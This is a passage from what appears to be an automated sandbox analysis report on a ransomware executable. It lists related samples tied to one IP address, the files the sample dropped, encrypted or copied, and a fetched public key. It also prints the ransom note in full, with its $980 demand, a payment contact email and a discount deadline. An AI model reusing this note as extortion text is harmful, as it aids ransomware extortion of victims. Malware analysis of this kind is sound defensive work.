                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    37f463bf4616ecd445d4a1937da06e19J7S1LG2U7h.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    State-ment(10.03.2021)BMEI.vbsGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    87654345670009876512345.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Invoice Packing list.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Request for Quotation-V-38545.docxGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    8I4piYF9Hh.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    pDHqdUDL46.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    LnKfVjpv17.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    SecuriteInfo.com.__vbaHresultCheckObj.28644.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    xXfEesozkk.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    pSYyr4E7n1.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    j4Lh6isNvA.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    pFhBSJjDob.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    eNQTy7EJ9m.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    U4vFkAja6j.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Abl9mKVK3M.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    PV520qx61b.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    ST9482219.xlsmGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    lilu6[1].dllGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Nv59S7J4me.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\SystemID\PersonalID.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):42
                                                                                    Entropy (8bit):4.70137575590605
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:5ioFVPw+USD3z0OSyn:8ob9LDjHSyn
                                                                                    MD5:10651CB4ED04E88154F6531BEE8BD193
                                                                                    SHA1:2197019068927D390FE85E0FF8E99BCA2464F84E
                                                                                    SHA-256:F828F7360FCC1A39E55C52697102E55B06B6DC35500F14FEAE10ADC23B48725C
                                                                                    SHA-512:2E625D7E54568F97D0ECE56F3BB0A27F0101BAD714288BACF1359656A818EA300FB35F30E9320D526D45BBCE9F0358EFF4891DEFBDBC857A350AA66D4F7646E1
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw..
                                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):618
                                                                                    Entropy (8bit):7.663846863103521
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:3mWpGIcDig4kBcuEJbFkX/7Vc6l3iftyWm55K2Upq+cOhXPIcii9a:/fg4kTEVF1u2tyrtUo+JXgbD
                                                                                    MD5:8F5EB1DB18D86361A5CF7A3A8EE18443
                                                                                    SHA1:BA151AFA6D48D755491E0E050ED3F5210535B640
                                                                                    SHA-256:734AE8EC96E243078884464A61E8DC1FF73FE800564489126AB6F58A21ED78E3
                                                                                    SHA-512:F79C5912AF9567B61208391C732361F1B04A32D9F8DB39C6116F0259DEED05D5630D49D5B851273FBDE6B3FCFE52F561BF9E562DDE7ED5FA981D132CED91D869
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .[H...|.. .._..~I......d..5.J.1......nx'.s..>..g.y..>..mVg.....)-u.P.......5.(...F(!..d.o.57.C..K}N.{Y..H..i......Y......7*../......z......I.3k.+i.O.qA..x.w.%.pT...d.|........HK=D..;.....4.....|1_#G,.f.e.y.S....2eU..o.....-...Aw.Pm.sW.[...\.V..:..D...R.[....q8..I.i.L..../..Z...'zmC...|......"..~o..VI....^.g.."...&Q"1.f5;....J`.h.v..x.v.j`...Dv9_|..H.:.&.].0.v...;)..HkV.U>.=+xU......h.....#..w$pgs...d}..!.<........L..$q.....47..NS.M....n&../.bim.!..H6F!I<.....s....-&...|.`._#..w........y,.2...Y.......+....9.D&...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):618
                                                                                    Entropy (8bit):7.663846863103521
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:3mWpGIcDig4kBcuEJbFkX/7Vc6l3iftyWm55K2Upq+cOhXPIcii9a:/fg4kTEVF1u2tyrtUo+JXgbD
                                                                                    MD5:8F5EB1DB18D86361A5CF7A3A8EE18443
                                                                                    SHA1:BA151AFA6D48D755491E0E050ED3F5210535B640
                                                                                    SHA-256:734AE8EC96E243078884464A61E8DC1FF73FE800564489126AB6F58A21ED78E3
                                                                                    SHA-512:F79C5912AF9567B61208391C732361F1B04A32D9F8DB39C6116F0259DEED05D5630D49D5B851273FBDE6B3FCFE52F561BF9E562DDE7ED5FA981D132CED91D869
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .[H...|.. .._..~I......d..5.J.1......nx'.s..>..g.y..>..mVg.....)-u.P.......5.(...F(!..d.o.57.C..K}N.{Y..H..i......Y......7*../......z......I.3k.+i.O.qA..x.w.%.pT...d.|........HK=D..;.....4.....|1_#G,.f.e.y.S....2eU..o.....-...Aw.Pm.sW.[...\.V..:..D...R.[....q8..I.i.L..../..Z...'zmC...|......"..~o..VI....^.g.."...&Q"1.f5;....J`.h.v..x.v.j`...Dv9_|..H.:.&.].0.v...;)..HkV.U>.=+xU......h.....#..w$pgs...d}..!.<........L..$q.....47..NS.M....n&../.bim.!..H6F!I<.....s....-&...|.`._#..w........y,.2...Y.......+....9.D&...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\2EM0SFDW\www.msn[1].xml
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):342
                                                                                    Entropy (8bit):7.1965127489924345
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:MVtlODiEVbkIgdSmiBEKV80Sa7YKVLZX9L8pAOYEzRuvKqRQot9job9LDjHSdkIX:UtlEPdkIzEKOEj0pAUzght9kPIcii9a
                                                                                    MD5:A29B8BCBF222E990DA572C31F4D20F77
                                                                                    SHA1:BD16A6633CDCE8443279D348843400D39DAF7EFE
                                                                                    SHA-256:66F845ABA9C7FD080F8575B468CBE211E46D6A8C3EB685CD1E34A58404C9215B
                                                                                    SHA-512:578E1EE967D082B6FB670671673923C8326A02AEC8302177D01299E4D45E8492E8528298D2AFAC61A1BD670476C8AC82ADA4101B1A18505D4DF46EEF90AC6878
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .._-...Y.J. ....l,..p....TA...\u...U.p.9.{m...._..Z.z..E...~aR'...x.^..4...c]]i.......dq...ya.H.R.;...g@(.%..!..\9..).Q.%0.r.........).....7......&!..5f.E...{B.]0;:..P,.dp@.......Bhn%c.9..Ny.g......^w....WRg(.......8..6.o..4...-....W.|..3Q..DJ.WP.V.Jm-..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\2EM0SFDW\www.msn[1].xml.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):342
                                                                                    Entropy (8bit):7.1965127489924345
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:MVtlODiEVbkIgdSmiBEKV80Sa7YKVLZX9L8pAOYEzRuvKqRQot9job9LDjHSdkIX:UtlEPdkIzEKOEj0pAUzght9kPIcii9a
                                                                                    MD5:A29B8BCBF222E990DA572C31F4D20F77
                                                                                    SHA1:BD16A6633CDCE8443279D348843400D39DAF7EFE
                                                                                    SHA-256:66F845ABA9C7FD080F8575B468CBE211E46D6A8C3EB685CD1E34A58404C9215B
                                                                                    SHA-512:578E1EE967D082B6FB670671673923C8326A02AEC8302177D01299E4D45E8492E8528298D2AFAC61A1BD670476C8AC82ADA4101B1A18505D4DF46EEF90AC6878
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .._-...Y.J. ....l,..p....TA...\u...U.p.9.{m...._..Z.z..E...~aR'...x.^..4...c]]i.......dq...ya.H.R.;...g@(.%..!..\9..).Q.%0.r.........).....7......&!..5f.E...{B.]0;:..P,.dp@.......Bhn%c.9..Ny.g......^w....WRg(.......8..6.o..4...-....W.|..3Q..DJ.WP.V.Jm-..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\NJ1L9FBN\www.google[1].xml
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):506
                                                                                    Entropy (8bit):7.519448795454053
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:SuBSjjQL8UPDHWrJP0Lg+nvw8RxVnjI5qDrYXJ+TGPIcii9a:t8i8UDHQuLg+nVR/nuqDrYXuGgbD
                                                                                    MD5:D44F2227204F8EAF66336337B50AE764
                                                                                    SHA1:5E911C6AE320CFA6F6CCAD933E4A772C92AD0DE4
                                                                                    SHA-256:0FCA80B758C176D5F3E581516F07D258942C1E384FECB0D627665BA211C0D885
                                                                                    SHA-512:AAD4840F56E1474E632992B627D1ECB7F72D6AAE7380DEDF0AE167623CFE6D81500596D6E7463B89517F9DDC797A5B93BEAC84C73B2C09872C80A9E75263356E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s....+.:..Kb.!.-I.v:M..{..~.....7..v9Q...yAc.x..q..y...t.[?..c5....Ky......S...o.......,\.4."a....fF..QY8,..N.F.'.#~..il)...{W...I#.}G2.n'..6......"az ..+A./..l...$.....uiQb...u.J:..6.g..-~5.X.:.....J.=..og.o...o...N.....>.MsV`j.a].......3..Q...0 ...}{i.....>...F^....XG.N..=G.q.r..Bo*7.....#.R.JR.gU....V..6.B..X..V...C...6=[..<...`.H..M..N.S.......*..r.!.h..h..vC.9......e.Q[.......g...{....?;.....fzaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\NJ1L9FBN\www.google[1].xml.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):506
                                                                                    Entropy (8bit):7.519448795454053
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:SuBSjjQL8UPDHWrJP0Lg+nvw8RxVnjI5qDrYXJ+TGPIcii9a:t8i8UDHQuLg+nVR/nuqDrYXuGgbD
                                                                                    MD5:D44F2227204F8EAF66336337B50AE764
                                                                                    SHA1:5E911C6AE320CFA6F6CCAD933E4A772C92AD0DE4
                                                                                    SHA-256:0FCA80B758C176D5F3E581516F07D258942C1E384FECB0D627665BA211C0D885
                                                                                    SHA-512:AAD4840F56E1474E632992B627D1ECB7F72D6AAE7380DEDF0AE167623CFE6D81500596D6E7463B89517F9DDC797A5B93BEAC84C73B2C09872C80A9E75263356E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s....+.:..Kb.!.-I.v:M..{..~.....7..v9Q...yAc.x..q..y...t.[?..c5....Ky......S...o.......,\.4."a....fF..QY8,..N.F.'.#~..il)...{W...I#.}G2.n'..6......"az ..+A./..l...$.....uiQb...u.J:..6.g..-~5.X.:.....J.=..og.o...o...N.....>.MsV`j.a].......3..Q...0 ...}{i.....>...F^....XG.N..=G.q.r..Bo*7.....#.R.JR.gU....V..6.B..X..V...C...6=[..<...`.H..M..N.S.......*..r.!.h..h..vC.9......e.Q[.......g...{....?;.....fzaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\WP4N5YVD\contextual.media[1].xml
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):495
                                                                                    Entropy (8bit):7.479818870945071
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:iNDXEmVg1WdDDQe67mFQycJxRvfbALgF8lPIcii9a:iNLFdAe679ycJ7A8F8lgbD
                                                                                    MD5:1506122F0981E283A037163ADFFBF471
                                                                                    SHA1:C8A3A55DBE7CEAEF568B221FA173B494721F1F31
                                                                                    SHA-256:9D598FF4093D7783872B6CF4C5E09A115E0F3093CB7C48B838B201D8892EDFB2
                                                                                    SHA-512:F24031C14E3FCC1A66A2B0EBF1055EDBF5B038201086BD432F6EC38A930417104037737450F9A67AD4EE2FE1DBEC4D90B085DA2BC58D304595AF291B3B00C302
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: G..tX..'t..G.,3].L...m#.e.Q.<..*.i..H...$Y.:.`.........6.h..1_.....k......e.*u.W.`I.,..}.r tS.6-..@r....6...af........."......(_v.y..\#... .6.2.p..pbCX@-..5..A.....,3kp.{..\F..%.2....x....J.|Y8...B.X.L).:G......-rf\.@\T..j.....0{...TV4....;...:....:......V#.._>0s*......:t{....,...ln2...7....P.}H.'..* B..3.L..9...@.A.'...S...;..%H.....-db.......A |H .8...?.y..Ws.2...._.+...t...n|.p.[^.V...k...jaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\WP4N5YVD\contextual.media[1].xml.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):495
                                                                                    Entropy (8bit):7.479818870945071
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:iNDXEmVg1WdDDQe67mFQycJxRvfbALgF8lPIcii9a:iNLFdAe679ycJ7A8F8lgbD
                                                                                    MD5:1506122F0981E283A037163ADFFBF471
                                                                                    SHA1:C8A3A55DBE7CEAEF568B221FA173B494721F1F31
                                                                                    SHA-256:9D598FF4093D7783872B6CF4C5E09A115E0F3093CB7C48B838B201D8892EDFB2
                                                                                    SHA-512:F24031C14E3FCC1A66A2B0EBF1055EDBF5B038201086BD432F6EC38A930417104037737450F9A67AD4EE2FE1DBEC4D90B085DA2BC58D304595AF291B3B00C302
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: G..tX..'t..G.,3].L...m#.e.Q.<..*.i..H...$Y.:.`.........6.h..1_.....k......e.*u.W.`I.,..}.r tS.6-..@r....6...af........."......(_v.y..\#... .6.2.p..pbCX@-..5..A.....,3kp.{..\F..%.2....x....J.|Y8...B.X.L).:G......-rf\.@\T..j.....0{...TV4....;...:....:......V#.._>0s*......:t{....,...ln2...7....P.}H.'..* B..3.L..9...@.A.'...S...;..%H.....-db.......A |H .8...?.y..Ws.2...._.+...t...n|.p.[^.V...k...jaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\YU3ONM33\www.microsoft[1].xml
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):565
                                                                                    Entropy (8bit):7.561441733137499
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:gQiclyK/lTwgdamaNifJPvGhQi4jPJNTqW0bx15X17eFYPIcii9a:5s+J9layxi6PXqWGz7lgbD
                                                                                    MD5:F9646F079E10AD1803797597B3116B51
                                                                                    SHA1:7A53BFA58C138F3165A162B78145EFF8A3E309D5
                                                                                    SHA-256:E857A03563C3C33AB5590BDB4FF564CFE885AFFA00743654240D70C9ADED1D18
                                                                                    SHA-512:5B850DB2462F7B21B03DEA223354315EB999EA48CF5100EA37FE4563709DA2D0D8ABF9C39260042060028DD416F038D3490E152FEAB8D3A46DF89DA4B8C1C6B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 9..Uxh5.4.....JGNc.l_a.i$s.Z.ug@.o.M0........o.*/.S..t..]t.!..r.}.....y.....t..A.M.-..z}B....._.i6wO.u..}.a...H......nM.bk...3P8e.m.6.p.\.>.CGmG..J_zl.u.\.W.6..QU.^.d3.t..m...aT..!.&Z.....^..H>N..Y]..1...~...a...U.8W..U.\.... ........[!....w.Z...&..o%X...\8<._...(...#.\N[j"8...O...g).|f......<..<. ..)..#>}..Y....l.6.....H.<.y.L.-@.B..p.. .....E ..UL,.I.DZ/i.?.. -.7..U...'[.;.zy..9.....k....Dt..N ...n...M.m..B........Z....v......x'..p...........-....m.......m.YciWaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\YU3ONM33\www.microsoft[1].xml.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):565
                                                                                    Entropy (8bit):7.561441733137499
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:gQiclyK/lTwgdamaNifJPvGhQi4jPJNTqW0bx15X17eFYPIcii9a:5s+J9layxi6PXqWGz7lgbD
                                                                                    MD5:F9646F079E10AD1803797597B3116B51
                                                                                    SHA1:7A53BFA58C138F3165A162B78145EFF8A3E309D5
                                                                                    SHA-256:E857A03563C3C33AB5590BDB4FF564CFE885AFFA00743654240D70C9ADED1D18
                                                                                    SHA-512:5B850DB2462F7B21B03DEA223354315EB999EA48CF5100EA37FE4563709DA2D0D8ABF9C39260042060028DD416F038D3490E152FEAB8D3A46DF89DA4B8C1C6B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 9..Uxh5.4.....JGNc.l_a.i$s.Z.ug@.o.M0........o.*/.S..t..]t.!..r.}.....y.....t..A.M.-..z}B....._.i6wO.u..}.a...H......nM.bk...3P8e.m.6.p.\.>.CGmG..J_zl.u.\.W.6..QU.^.d3.t..m...aT..!.&Z.....^..H>N..Y]..1...~...a...U.8W..U.\.... ........[!....w.Z...&..o%X...\8<._...(...#.\N[j"8...O...g).|f......<..<. ..)..#>}..Y....l.6.....H.<.y.L.-@.B..p.. .....E ..UL,.I.DZ/i.?.. -.7..U...'[.;.zy..9.....k....Dt..N ...n...M.m..B........Z....v......x'..p...........-....m.......m.YciWaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):833536
                                                                                    Entropy (8bit):7.776107857840815
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:KxrffFxEHP0VOTfvvQfDDkuM5glE15y4EXJUnrAtHbVzxp6L:K19xw0V6n4LLM5glE15HcJoABd36L
                                                                                    MD5:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    SHA1:F6A71793288CC09397B262FBA8FC38B29073A44E
                                                                                    SHA-256:0D977E55742460C71884D6040178FC8C7ABF8C97136B6293DA37CBF9C59B6778
                                                                                    SHA-512:ECED75D02B832BF68657835F1EF194AC39C04A806951F2D48F33AB5722804FDC0A8530507761C1DC0E2696D6DC8523A60541895E44EAC3B886C288CCC4F21A45
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                    Reputation:unknown
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...2.W_.................`...........F.......p....@....................................................................O...,...(....... ............................r..............................`...@............p...............................text....`.......`.................. ..`.rdata...Y...p...Z...d..............@..@.data............&..................@....rsrc... ...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\geo[1].json
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):447
                                                                                    Entropy (8bit):4.677584706717842
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YZIW6wpHEx6uVRTQVJQjRb8EQVt7YIRwIyFp3m9KLP2JSzYpuX4n:YXHDqRTQVJQjRb8EQVt7YIu1Dm9Kr2cw
                                                                                    MD5:74DE26126E31B2DCD1B740436D5F6C3D
                                                                                    SHA1:A599DC5836F7E77AD8D21636EA2542C5E7528854
                                                                                    SHA-256:F08427BBE80D2D3C03A7FA644B4E22D120640856D858E76F69CAACD124560F28
                                                                                    SHA-512:4AF41C7541E1554FFD1F5B1863227958181E7E5C34F38C37A2D8547F1B760B73F8D7B975D0F1ABD56055E9E5D4E3A43D8FF16135D847EA871A0A2AF11EDDCB6B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u0412\u0456\u0440\u0433\u0456\u043d\u0456\u044f","city":"Reston","city_rus":"\u0420\u0435\u0441\u0442\u043e\u043d","latitude":"38.96872","longitude":"-77.3411","zip_code":"20190","time_zone":"-04:00"}
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\get[1].htm
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):558
                                                                                    Entropy (8bit):6.01499008069915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YGJ68pFAISpgM26GIFJUDoaWm5CFgC31wUZXmNKM57B:YgJpGI89FJFarQvx2UMhB
                                                                                    MD5:44826762375626B4DBC29A65879173F7
                                                                                    SHA1:46D373B493EB8070FEF5FC6CE7FD65DF44A28580
                                                                                    SHA-256:8A91D4610515779C84F6715AD364786816169427C5D77E0D8B36F484E057D16C
                                                                                    SHA-512:CA70474751DEF7A3FECE1D5BD2EDA70381D7CBECAF9413300A010741F9F8EE84F9F7B3149F542C7FB23A179D0514A81E775B57FC74F0DF8616D6A4D8F5031BEB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}
                                                                                    C:\Users\user\AppData\Local\VirtualStore\_readme.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1110
                                                                                    Entropy (8bit):4.877671780222618
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW2mFRqrl3W4kA+GT/kF5M2/k/rAXTJhy:WZHfv0p6W2PFWrDGT0f/k/4u
                                                                                    MD5:63EC47014492996F7809A1D7CC88DD90
                                                                                    SHA1:C6F22DD4060A48F26ED971CAFABA6A2E296D2D88
                                                                                    SHA-256:371EED226E88A1C1E4A129581F873F72A0BDC68985EB38A07353A7201113D276
                                                                                    SHA-512:2299D7814D0A2772DE23DBABF16D45A35D40174429F0B756CE1F3E56869F20BDA4BC708F51905CC72FE8F96CDC37E969E07C2BAA14A2990E4CF16121BE346281
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-1JwFK5rT39..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                    C:\Users\user\AppData\Local\bowsakkdestx.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):558
                                                                                    Entropy (8bit):6.01499008069915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YGJ68pFAISpgM26GIFJUDoaWm5CFgC31wUZXmNKM57B:YgJpGI89FJFarQvx2UMhB
                                                                                    MD5:44826762375626B4DBC29A65879173F7
                                                                                    SHA1:46D373B493EB8070FEF5FC6CE7FD65DF44A28580
